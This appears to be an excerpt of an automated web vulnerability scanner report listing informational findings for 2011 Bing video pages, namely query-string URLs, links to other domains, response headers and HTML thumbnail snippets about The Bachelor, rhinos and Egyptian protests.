<span class="motionThumbContainer">
...[SNIP]...
helor Brad Womack gets a message from every woman in America. "The Bachelor" premieres Monday, January 3, on ABC." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=29c72bc5-8bec-4507-8628-d78be2839869&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
32;sees Brad kissing other girls on his one-on-one dates. "The Bachelor" airs Mondays at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=0d1c240e-7bf9-416b-95d4-75f4f5ffc8e0&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
#32;Croft confront Brad Womack about the past. "The Bachelor" returns Monday, Jan. 3, at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=6a5e9ed3-864e-44e1-8647-406388ff03a6&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 of Love: Women Tell All" airs. The 31-year-old airline pilot says he wasn't nervous about facing the ladies." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=ad3c2eb0-1f32-11df-bdab-297063a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title=""The Bachelor" host Chris Harrison dishes with ET about Jason Mesnick's controversial choice." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=96753e0a-093b-11de-a48f-df3463a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
2;woman's got to do what a woman's got to do. "The Bachelor" airs Mondays at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=0adbe522-6a74-451d-8cd6-9845b029ea9f&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
not before he faces down Jenni and DeAnna. "The Bachelor" returns Monday, Jan. 3, at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93460806-1390-4bcc-b73e-707aa1ec15b2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.401. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=0adbe522-6a74-451d-8cd6-9845b029ea9f&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=29c72bc5-8bec-4507-8628-d78be2839869&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=fb70b5cf-e1ce-463f-98e1-802a4aabcfdc&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=0d1c240e-7bf9-416b-95d4-75f4f5ffc8e0&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=43065b0c-5953-34d2-e109-849136b24fc4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=6a5e9ed3-864e-44e1-8647-406388ff03a6&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93460806-1390-4bcc-b73e-707aa1ec15b2&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img4.catalog.video.redacted/Image.aspx?uuid=44ab0283-7d4d-490a-bf56-a89601f19d8f&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=96753e0a-093b-11de-a48f-df3463a74c6d&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=ace94fcc-a11e-46dc-8876-396aaf0d06e4&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fbachelor-brad-womack-part-1%2f17w4gt3fa%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/the-tonight-show-with-jay-leno
http://www.hulu.com/watch?content_id=50117742
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=205
Content-Length: 106002
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:55:54 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:28 GMT
Connection: close
Set-Cookie: _SS=SID=526744E78A5C45B4A8C55A348BE8B072; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0c3b1caf1c6f4efba4bfa2e6a6311370; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fbachelor-brad-womack-part-1%2f17w4gt3fa%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/the-tonight-show-with-jay-leno" data-instName="InfoRelatedLinks">Hulu - The Tonight Show with Jay Leno</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117742" data-instName="InfoRelatedLinks">Hulu Watch Page - Bachelor Brad Womack, Part 1</a>
...[SNIP]...
lor&rel=MSN" class="motionThumb playerUrl"
title="We recap "The Bachelor," "House," "19 Kids and Counting" and "Skins."" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=43065b0c-5953-34d2-e109-849136b24fc4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ies, starring "Bachelor" alum Brad Womack. "The Bachelor" returns Monday, Jan. 3, at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=ace94fcc-a11e-46dc-8876-396aaf0d06e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
helor Brad Womack gets a message from every woman in America. "The Bachelor" premieres Monday, January 3, on ABC." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=29c72bc5-8bec-4507-8628-d78be2839869&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;shares a personal story with the rest of the ladies. "The Bachelor" airs Mondays at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=44ab0283-7d4d-490a-bf56-a89601f19d8f&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
32;sees Brad kissing other girls on his one-on-one dates. "The Bachelor" airs Mondays at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=0d1c240e-7bf9-416b-95d4-75f4f5ffc8e0&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
#32;Croft confront Brad Womack about the past. "The Bachelor" returns Monday, Jan. 3, at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=6a5e9ed3-864e-44e1-8647-406388ff03a6&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
2;woman's got to do what a woman's got to do. "The Bachelor" airs Mondays at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=0adbe522-6a74-451d-8cd6-9845b029ea9f&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title=""The Bachelor" host Chris Harrison dishes with ET about Jason Mesnick's controversial choice." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=96753e0a-093b-11de-a48f-df3463a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
her contestants when she returns from her shopping spree. "The Bachelor" airs Mondays at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=fb70b5cf-e1ce-463f-98e1-802a4aabcfdc&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
not before he faces down Jenni and DeAnna. "The Bachelor" returns Monday, Jan. 3, at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93460806-1390-4bcc-b73e-707aa1ec15b2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.402. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo?q=Rhino&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=2fb3516f-54b9-4bd5-a491-8bff7f44dcad&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=5500405e-9443-46d7-af2a-24cfe03815bb&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=743fcf16-7af5-4498-af29-5a1112bc5539&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=75036051-5bab-4202-86d7-0c93634bf6f5&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9511ec33-7dd6-4738-b963-6a609f7c812c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=b5ec71d6-75d7-4788-8e82-a5acf8d2941c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=b6b7d4e8-0dc4-4068-8c36-e36f3ee300d0&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=e1cc06d0-c9d9-439f-9ee8-1ba3b74dddaf&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=15119991-e508-4792-9faa-d19a9bc937cd&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=a1c85bf4-4933-4977-a9ba-a03f18dfb550&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=a1c85bf4-4933-4977-a9ba-a03f18dfb550&w=400&h=300&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fblack-rhino-celebrates-40th-birthday%2fufh7y1eo%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.redacted/
http://www.u-zoo.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 107914
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:16:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.547 secs
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:01:54 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42007; domain=.bing.com; path=/videos
Set-Cookie: ocid=42007; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=FE632F9AB87C4452AFEDD763816ED419; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5525b056b9174877ae080754e0e2103b; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621021&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:01:54 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo" /><link rel="image_src" href="http://img3.catalog.video.redacted/Image.aspx?uuid=a1c85bf4-4933-4977-a9ba-a03f18dfb550&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fblack-rhino-celebrates-40th-birthday%2fufh7y1eo%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.u-zoo.com/" data-instName="InfoRelatedLinks">U-Zoo</a>
...[SNIP]...
ionThumb playerUrl"
title="Rukwa the black rhino celebrates a special birthday at Great Britain's Port Lympne Wild Animal Park." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=a1c85bf4-4933-4977-a9ba-a03f18dfb550&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ww.bing.com/videos/watch/video/cute-baby-rhino/uf5nsju1?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="A newborn rhino steals some hearts at Berlin Zoo." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=15119991-e508-4792-9faa-d19a9bc937cd&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Hero, the 2-year-old white rhino, makes himself at home with the Villa family in South Africa." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=5500405e-9443-46d7-af2a-24cfe03815bb&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
f66nvuu?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="This baby rhino was the first in the world ever to be conceived artificially." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=75036051-5bab-4202-86d7-0c93634bf6f5&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
dern-suvs/ufa8j1mi?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="Here is a futuristic prototype vehicle from the '50s called the Rhino." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=2fb3516f-54b9-4bd5-a491-8bff7f44dcad&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ght/pexxh15?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="Things look bad for the mom until the brave baby races to her rescue!" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9511ec33-7dd6-4738-b963-6a609f7c812c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
/uf3fwjbd?q=Rhino&rel=MSN" class="motionThumb playerUrl"
title="Strange tale of a goat and a rhino who've inexplicably become best friends." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=743fcf16-7af5-4498-af29-5a1112bc5539&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
2;Conservation efforts have helped the white rhinos come back from near extinction. MSNBC.com's Dara Brown has the story." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=b5ec71d6-75d7-4788-8e82-a5acf8d2941c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
#58; The endangered and elusive Sumatran rhino is seen on video in the wild, slowly sniffing its way to a camera." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=e1cc06d0-c9d9-439f-9ee8-1ba3b74dddaf&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;watched live on the Internet, has stepped out into the sunshine - and the limelight - at Britain's Paignton Zoo." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=b6b7d4e8-0dc4-4068-8c36-e36f3ee300d0&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.403. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo?q=who+do+you+think+you+are&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008
